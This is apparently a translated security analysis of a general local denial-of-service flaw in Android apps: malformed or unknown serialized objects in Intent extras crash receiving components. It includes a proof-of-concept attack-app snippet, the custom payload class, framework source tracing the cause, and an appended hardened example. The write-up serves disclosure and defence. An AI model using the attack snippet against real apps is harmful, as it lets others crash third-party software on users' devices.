Analysis Report: A General-Purpose Denial-of-Service Vulnerability in Android Apps

Source: Internet
Author: User

Editor's note: There was a time when many SRC platforms were flooded with reports of local denial-of-service vulnerabilities in apps. The mobile security team Love Beta (ineice.com) found a generic denial-of-service vulnerability in Android clients; their detailed analysis follows.


0xr0ot and Xbalien found a general-purpose local denial-of-service vulnerability while exchanging notes on all of the exception types that can lead to an application denial of service. This general-purpose local denial of service can affect a large number of apps.


Denial of service through serialized objects is mainly caused by the application's use of the getSerializableExtra() API. Because the application developer does not validate the incoming data, a malicious application can pass in malformed data and cause a local denial of service in the application.


Vulnerable application code snippet:

    Intent i = getIntent();
    if (i.getAction().equals("Serializable_action")) {
        i.getSerializableExtra("Serializable_key"); // no exception handling
    }

Attack application code snippet:

    Intent i = new Intent();
    i.setAction("Serializable_action");
    i.setClassName("com.exp.serializable", "com.exp.serializable.MainActivity");
    i.putExtra("Seriadddddlizable_dkey", XXX); // the malformed data is passed in here
    startActivity(i);


For example, passing BigInteger.valueOf(1) as XXX is very likely to cause a type-conversion exception, java.lang.ClassCastException.

Later discussion showed, however, that when a custom Serializable or Parcelable object is passed in, the target component receiving the Intent throws a class-not-defined error, java.lang.NoClassDefFoundError, at getSerializableExtra() or getParcelable(). This is because the vulnerable application is handed a serialized object of a class that does not exist in the application itself, so the class cannot be found in that application's context.


The custom serializable class is simple:

    import java.io.Serializable;

    public class DataSchema implements Serializable {
        private static final long serialVersionUID = -3601187837704976264L;

        public DataSchema() {
            super();
        }
    }


With new DataSchema() passed as XXX in the attack code, we found that the class-not-defined error is thrown regardless of whether the key passed in matches the one the vulnerable application reads.


As testing continued, we saw in Logcat that the error was not necessarily raised by getSerializableExtra() or getParcelable(). We then widened the test and passed our custom serialized object to components that call getXXXExtra(), and found that the class-not-defined error was thrown there as well.


Test app code snippet:

    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent intent = getIntent();
        intent.getStringExtra("ROIS"); // this still crashes with NoClassDefFoundError
    }

We then tested a number of mainstream applications on the market, including those from BAT, and found that this method worked against them. We began to suspect that the problem lay in Android itself and started reading the source code.

    public String getStringExtra(String name) {
        return mExtras == null ? null : mExtras.getString(name);
    }

    /frameworks/base/core/java/android/os/Bundle.java

    public String getString(String key) {
        unparcel(); // process the data
        ...
    }

    /* package */ synchronized void unparcel() {
        ...
        mParcelledData.readMapInternal(mMap, N, mClassLoader);
        ...
    }

    /frameworks/base/core/java/android/os/Parcel.java

    readMapInternal parses the data passed in
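
A hardened counterpart to the vulnerable receiver shown earlier, added here as an example and not code from the original report: it treats every Intent extra as untrusted, catches the failures described above, and exits cleanly instead of crashing. The class name HardenedActivity, the package com.example.hardened, and the assumption that the component expects a String payload are hypothetical.

```java
package com.example.hardened; // hypothetical package name

import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;

import java.io.Serializable;

/** Exported activity that treats every Intent extra as untrusted input. */
public class HardenedActivity extends Activity {
    private static final String TAG = "HardenedActivity";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent intent = getIntent();
        String action = intent == null ? null : intent.getAction();
        // Constant-first equals() avoids a NullPointerException when no action is set.
        if (!"Serializable_action".equals(action)) {
            finish();
            return;
        }
        Serializable value = readSerializableExtra(intent, "Serializable_key");
        // Assumption: this component expects a String payload; anything else is rejected.
        if (!(value instanceof String)) {
            Log.w(TAG, "Rejecting Intent with missing or unexpected extra");
            finish();
            return;
        }
        String payload = (String) value;
        Log.d(TAG, "Accepted payload of length " + payload.length());
    }

    /**
     * As the report shows, getXXXExtra() unparcels the extras Bundle, so an object of a
     * class this app does not contain fails here whatever key it was stored under.
     */
    private static Serializable readSerializableExtra(Intent intent, String key) {
        try {
            return intent.getSerializableExtra(key);
        } catch (RuntimeException | NoClassDefFoundError e) {
            // Covers ClassCastException and the NoClassDefFoundError seen in the report.
            Log.w(TAG, "Malformed extras from caller", e);
            return null;
        }
    }
}
```

The same try/catch wrapper applies to every other getXXXExtra() call in an exported component, since the report shows getStringExtra() failing in the same way.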

